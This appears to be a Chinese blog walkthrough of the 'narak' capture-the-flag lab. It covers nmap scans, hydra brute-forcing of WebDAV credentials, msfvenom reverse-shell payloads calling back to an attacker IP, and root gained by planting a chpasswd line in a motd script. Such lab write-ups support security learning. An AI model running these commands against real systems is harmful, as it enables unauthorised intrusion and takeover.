当前位置:网站首页>打靶narak

打靶narak

2022-04-23 02:28:00 嗯光

主机发现

nmap -sS 192.168.226.0/24

端口扫描

在这里插入图片描述

dirb基于字典的目录扫描工具

发现三个目录
在这里插入图片描述

在这里插入图片描述
访问该目录

网络存储文件共享之WebDAV

在这里插入图片描述
再用hydra爆破以下
或者burpsuite爆破
yamdoot, Swarg

.海德拉(Hydra)
Medusa(美杜莎)
patator
msf
都可以

用cewl工具通过爬取网站信息的关键字来生成字典,通过生成的字典进行爆破

在这里插入图片描述

用hydra爆破工具爆破

-L指定用户名 -P指定密码 ip地址加协议加路径。http就是网站的协议,get是采用的请求方法,后面加路径

在这里插入图片描述

再尝试登陆下:

在这里插入图片描述

无可用信息,查看下源代码:

cadaver工具连接

cadaver http://192.168.8.132/webdav

username:yamdoot

password:Swarg

1.百度发现webdav服务,需要cadaver工具连接,连接之后可以上传

在这里插入图片描述

上传shell

nmap -O 发现其实 linux 系统
在这里插入图片描述

msfvenom生成木马

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22456 -f elf -o /home/kali/Desktop/yui.elf

在这里插入图片描述
监听
在这里插入图片描述
上传
在这里插入图片描述
liunx失败换一个php的

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php

在这里插入图片描述
msf 监听
访问php文件
在这里插入图片描述
shell拿到
在这里插入图片描述

提权 权限维持

权限低
在这里插入图片描述

查看用户:

在这里插入图片描述
mnt 目录 hell.sh
在这里插入图片描述
https://www.splitbrain.org/services/ook

在这里插入图片描述
brainfuck to text解码,得到解密内容chitragupt 应该是密码
chitragupt

提权助手 提权 github 开源项目

https://github.com/mzet-/linux-exploit-suggester

linux中的.sh文件怎么执行?

1、直接./加上文件名.sh,如运行hello.sh为 ./hello.sh 【绝对路径下也可以,但hello.sh必须有x权限】

chmod u+x hello.sh
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

挨个试一试

在这里插入图片描述
上传解压
在这里插入图片描述
用ssh尝试登录其他用户,输入刚刚解密的密码,发现成功登录该用户

ssh [email protected]

在这里插入图片描述
在这里插入图片描述

echo “echo ‘root:inferno’|sudo chpasswd” >> /etc/update-motd.d/00-header

退出后重新用inferno登录

su -root

成功获取root权限: 密码 inferno
在这里插入图片描述

版权声明
本文为[嗯光]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_42096378/article/details/124353688

边栏推荐

猜你喜欢

随机推荐